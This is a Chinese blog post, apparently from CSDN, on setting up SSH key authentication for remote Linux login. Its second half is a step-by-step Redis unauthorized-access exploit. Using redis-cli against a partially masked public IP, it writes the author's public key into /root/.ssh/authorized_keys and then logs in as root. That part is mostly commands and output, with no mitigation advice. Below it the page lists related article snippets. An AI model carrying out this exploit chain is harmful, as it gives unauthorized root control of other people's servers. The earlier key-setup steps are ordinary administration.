linux 密钥机制,使用密钥认证机制远程登录Linux

最新推荐文章于 2024-01-03 22:49:21 发布
最新推荐文章于 2024-01-03 22:49:21 发布
阅读量192 收藏
点赞数
文章标签: linux 密钥机制

密钥认证机制

创建存放key的文件

1)创建目录 /root/.ssh 并设置权限

[root@localhost ~]# mkdir /root/.ssh mkdir 命令用来创建目录,以后会详细介绍,暂时只了解即可。

[root@localhost ~]# chmod 700 /root/.ssh chmod 命令是用来修改文件属性权限的,以后会详细介绍。

2)创建文件 / root/.ssh/authorized_keys

[root@localhost ~]# vim /root/.ssh/authorized_keys

生成Key

Xshell-【新建用户密钥生成向导】,密钥类型选择RSA,密钥长度选择2048位,生成密钥名称,加密的密码。

复制生成的公钥到远程linux里面 /root/.ssh/authorized_keys 文件中。如果没有.ssh目录,就自行建立,并更改目录权限为700。粘贴公钥的内容,保存退出。

就可以利用密钥登录了

漏洞场景-redis未授权访问漏洞

1)本地生成秘钥

root@XXX:~# ssh-keygen -t rsa

2)将公钥写入一个文件

root@XXX:~# cd /root/.ssh/

root@XXX:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

3)连接redis写入文件

root@XXX:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit

OK

root@XXX:~/.ssh# redis-cli -h 210.73.90.xxx

210.73.90.xxx:6379> config set dir /root/.ssh/

OK

(1.39s)

210.73.90.xxx:6379> CONFIG GET dir

1) "dir"

2) "/root/.ssh"

210.73.90.xxx:6379> config set dbfilename "authorized_keys"

OK

(1.03s)

210.73.90.xxx:6379> SAVE

OK

210.73.90.xxx:6379> exit

root@XXX:~/.ssh# ssh

4)连接服务器

root@XXX:~/.ssh# ssh -i id_rsa root@210.73.90.xxx

鱼椽子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux中的远程登陆服务 ---Openssh服务的基本信息、key认证、安全配置(端口修改、端口绑定、密码认证关闭、sshd服务的用户控制)、sshd登陆信息修改
Horizon_carry的博客
04-26 796
一.实验环境 horizon_carry 172.25.254.10 carry 172.25.254.20 ifconfig ##查看ip地址 nm-connection-editor #...
Linux配置实现免密钥登录过程解析
09-14
密钥登录和`scp`文件传输是Linux系统管理中的重要工具,尤其在需要频繁进行远程操作和文件传输的集群环境中,它们极大地提高了工作效率和安全性。确保正确配置并妥善保管私钥,可以有效防止未经授权的访问。
使用Xshell密钥认证机制远程登录Linux
weixin_34191845的博客
03-11 139
1、打开Xshell界面,中文界面方便操作,菜单栏:工具——新建用户密钥生成向导2、密钥类型选择RSA,密钥长度选择2048位,单击下一步继续;3、很快生成公钥对,单击下一步继续;4、密钥名称可以自定义,起一个自己理解的名称,或者保持默认,输入密钥加密的密码,用于远程登录;5、将生成的公钥复制一份,或保存为文件,完成密钥生成。6、复制生成的公钥到远程linux里面 /root/.ssh/autho...
linux密码验证机制,使用Xshell密钥认证机制远程登录Linux
weixin_39966465的博客
04-29 487
1、打开Xshell界面,中文界面方便操作,菜单栏:工具——新建用户密钥生成向导2、密钥类型选择RSA,密钥长度选择2048位,单击下一步继续;3、很快生成公钥对,单击下一步继续;4、密钥名称可以自定义,起一个自己理解的名称,或者保持默认,输入密钥加密的密码,用于远程登录;5、将生成的公钥复制一份,或保存为文件,完成密钥生成。6、复制生成的公钥到远程linux里面 /root/.ssh/autho...
Linux基础—使用密钥认证机制远程登录linux
此博客已停用,博文会逐渐转移到新地址,http://blog.csdn.net/liupeifeng3514
02-12 1549
使用密钥认证机制远程登录linux SSH 为 Secure Shell 的缩写,由 IETF 的网络工作小组(Network Working Group)所制定。 SSH 为建立在应用层和传输层基础上的安全协议。 首先使用工具 PUTTYGEN.EXE 生成密钥对。打开工具PUTTYGEN.EXE后如下图所示: 该工具可以生成三种格式的key :SSH-1(R
linux远程登录 密钥,使用密钥认证机制远程登录Linux
weixin_33490603的博客
05-08 514
密钥认证机制创建存放key的文件1)创建目录 /root/.ssh 并设置权限[root@localhost ~]# mkdir /root/.ssh mkdir 命令用来创建目录,以后会详细介绍,暂时只了解即可。[root@localhost ~]# chmod 700 /root/.ssh chmod 命令是用来修改文件属性权限的,以后会详细介绍。2)创建文件 / root/.ssh/auth...
Linux系统使用RSA密钥登录远程服务器.pdf
09-09
Linux系统使用RSA密钥登录远程服务器 所有操作都在本机执行,可不需要进入远程服务器操作~ 生成密钥,默认是RSA 2048bit算法加密。
Linux系统使用用户密钥ssh主机访问
09-15
主要介绍了Linux系统使用用户密钥ssh主机访问,它在安全上完全大于直接输入root 的密码,有需要的可以了解一下。
Linux远程登录实现教程解析
09-14
Linux远程登录是管理和维护远程Linux服务器的关键技术,尤其在服务器被安置在远程机房时,这一功能显得尤为重要。Linux系统中的远程登录主要是通过Secure Shell (SSH) 服务实现的,该服务默认监听22端口。Windows...
linux远程登录ssh免密码配置方法
09-15
SSH免密码登录的实现基于密钥认证机制。每个主机可以通过`ssh-keygen`命令生成一对密钥,包括一个私钥(private key)和一个公钥(public key)。私钥保存在本地,而公钥则可以安全地传输到远程主机。当本地主机...
Linux设置SSH通过密钥登录
05-31
我们一般使用PuTTY等SSH客户端来远程管理 Linux 服务器。但是,一般的密码方式登录,容易有密码被 暴力破解的问题。所以,一般我们会将 SSH 的端口设置为默认的 22 以外的端口,或者禁用 root 账户登 录。其实,有一个更好的办法来保证安全,而且让你可以放心地用 root 账户从远程登录——那就是通过 密钥方式登录密钥形式 登录的原理是:利用密钥生成器制作一对密钥;(公钥文件和私钥文件)。将公钥添加到服务器的 某个账户上,然后在客户端利用私钥即可完成认证登录。这样一 来,没有私钥,任何人都无法通过 SSH 暴力破解你的密码来远程登录到系统。此外,如果将公钥复制到其他账户甚至主机,利用私钥也可以登录。 下面来讲解如何在 Linux 服务器上制作密钥对,将公钥添加给账户,设置 SSH,最后通过客户端登录。 方式
linux使用密钥登录
君临天下的博客
01-03 1932
通常SSH设备采用密码登录方式。但一般的密码方式登录,容易被暴力破解,安全性不足。为保证安全性,可以使用密钥方式登录
linux服务器密钥远程登录
u013617791的专栏
05-03 250
客户端设置 在客户端电脑生成密钥文件, 执行如下命令 ssh-keygen -t rsa -C "youremail@example.com" 服务器设置 进入~/ .ssh/文件夹 查看 ~/ .ssh/文件夹下是否存在id_rsa id_rsa.pub 文件, 若存在, 则直接第2步, 否则执行如下命令,在~/.ssh中会生成两个文件,id_rsa(私钥),id_rsa.pub(公钥): ssh-keygen -t rsa 将公钥写入信任列表文件authorized_keys
使用密钥认证机制远程登录Linux
weixin_34367845的博客
01-03 129
关于密钥的工作原理,如果你感兴趣可以到网上查一查,阿铭不想介绍太多无关知识点,不过,了解一下也没有什么不好。双击puttygen.exe, 右下角 “Number of bits in a generated key” 把 “1024” 改成 “2048”, 然后点 “Generate”, 这样就开始生成密钥了,请来回动一下鼠标,这样才可以快速生成密钥对,大约十几秒后就完成了...
网络、远程登录
chengqianbing6225的博客
01-21 177
配置网络 配置网络目的: 1)远程登录它 2)可以使用yum安装其它的包 配置网络步骤: 1)执行dhclient命令,自动获取IP地址(NAT模式,它可以自动生成一个IP地址) 查看IP地址的命令: ip addr 快捷键 ctrl L 清屏 2)配置IP地址,你需要知道:IP地址,子网掩码...
远程登录linux 秘钥,SSH密钥方式远程登录配置案例
weixin_34259909的博客
05-07 293
###案例描述:现在有一台CentOS 6.5 的服务器,IP地址为192.168.85.25/24。该服务器将用于搭建Web服务器,为Web服务器考虑到安全因素,需要对SSH远程连接进行加强安全措施。###案例需求:1、只能slae普通用户登录2、只允许slae用户通过192.168.85.1的IP地址进行SSH远程登录3、为slae配置只允许通过密钥方式进行登录###案例过程:编辑SSH的配置...
Linux中创建ssh密钥的命令,Linux之SSH密钥认证(示例代码)
weixin_33520849的博客
04-28 307
1、SSH协议的认识SSH 为Secure Shell的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时...
linux服务器设置密钥登录
落白
06-24 402
先在本地电脑上生成rsa密钥(可通过安装git来支持),然后将公钥复制到远程服务器指定用户家目录下的.ssh/authorized_keys文件中,完成以上两部操作后,即可在本地通过密钥验证的模式访问远程服务器了 # 本地生成rsa密钥(自定义命名id_rsa_tom,本地测试服务器ip:92.168.1.201) ssh-keygen -m PEM -t rsa -f id_rsa_tom -b 4096 -C "tom@test.com" # 复制公钥到服务器指定用户下的.ssh/authorize
linux optee机制分析
最新发布
02-19
"本文主要分析了Linux系统下的OP-TEE机制,这是一种基于Arm TrustZone技术的可信执行环境(TEE)。OP-TEE与Linux内核协同工作,为受信任的应用程序提供服务,遵循GlobalPlatform API规范。文章探讨了TrustZone硬件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值